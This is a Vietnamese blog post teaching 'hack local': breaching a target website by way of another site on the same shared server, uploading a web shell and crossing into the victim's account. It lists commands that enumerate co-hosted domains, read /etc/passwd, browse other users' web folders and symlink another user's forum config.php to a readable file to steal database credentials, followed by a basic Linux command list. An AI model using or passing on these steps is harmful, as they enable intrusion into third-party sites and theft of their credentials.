Trao đổi với tôi

http://www.buidao.com

1/18/10

[Hacking] Cách dùng shell hacklocal + 1 số lệnh cơ bản


Đầu tiên mình nói qua qua về hack local tức là hack 1 website(host)nào đó có dùng host chạy chung 1 server

Ví dụ a e muốn hack 1 site nào đó a -e fai check xem nó nằm ở server nào,và nhưng web nào có cùng chạy trên server đó...và khai thác các site cùng server đó xem site nào lỗi để mình có thể thực hiện đc ý đồ ở đây là upload đc công cụ hack của mình lên.
Hiện nay Mình Thấy Dùng Shell là thông dụng nhất , Nếu có host cùng sever với bọn nó thì càng tốt ,up con shell lên host của mình để local sang

Highslide JS


Dưới đây là 1 số lệnh khi sử dụng shell
Xem tên domain trên cùng 1 host


ls -la /etc/valiases
cd /etc/vdomainaliases;ls -lia


Trường hợp đặc biệt khi không thể xem user nằm cùng host thì ta thêm && vào

cd /etc/vdomainaliases && ls -lia


+ Muốn biết tên user thì xài lệnh này :
Trích dẫn

cat /etc/passwd/

Hoặc
Trích dẫn

less /etc/passwd

+ local sang victim
vd con shell mình là :
Trích dẫn
/home/abcd/public_html/


thì mình sẽ local sang nhu sau :
Trích dẫn
dir home/tên usercần local/public_html

+Xem nội dung của file
vd :
Trích dẫn
cat /home/tên user cần local/public_html/index.php


hoặc Ví dụ mình muốn xem config của 1 forum thì dùng
ln -s /home/tên user cần local/public_html/forum/includes/config.php abc.txt <-- abc.txt ở đây là file bạn tạo ra trên host của bạn để xem file của người khác ! Nếu bạn sử dụng k0 được các lệnh trên tức là server đã disable chức năng đó.Sẽ update thêm Thêm 1 số lệnh shell trong linux - pwd: đưa ra ngoài màn hình thư mục đang hoạt động (ví dụ: /etc/ssh). - cd: thay đổi thư mục (ví dụ: cd .. – ra một cấp thư mục hiện tại; cd vidu – vào thư mục /vidu). - ls: đưa ra danh sách nội dung thư mục. - mkdir: tạo thư mục mới (mkdir tên_thumuc). - touch: tạo file mới (touch ten_file). - rmdir: bỏ một thư mục (rmdir ten_thumuc). - cp: copy file hoặc thư mục (cp file_nguồn file_đích). - mv: di chuyển file hoặc thư mục; cũng được dùng để đặt lại tên file hoặc thư mục (mv vị_trí_cũ vị_trí_mới hoặc mv tên_cũ tên_mới). - rm: loại bỏ file (rm tên_file). Để tìm kiếm file, bạn có thể dùng: - find : dùng cho các tên file. - grep <>: để tìm nội dung trong file.
Để xem một file, bạn có thể dùng:
- more : hiển thị file theo từng trang.
- cat <>: hiển thị tất cả file.
RefLink: http://pleasemakeanote.blogspot.com/2008/06/posting-source-code-in-blogger.html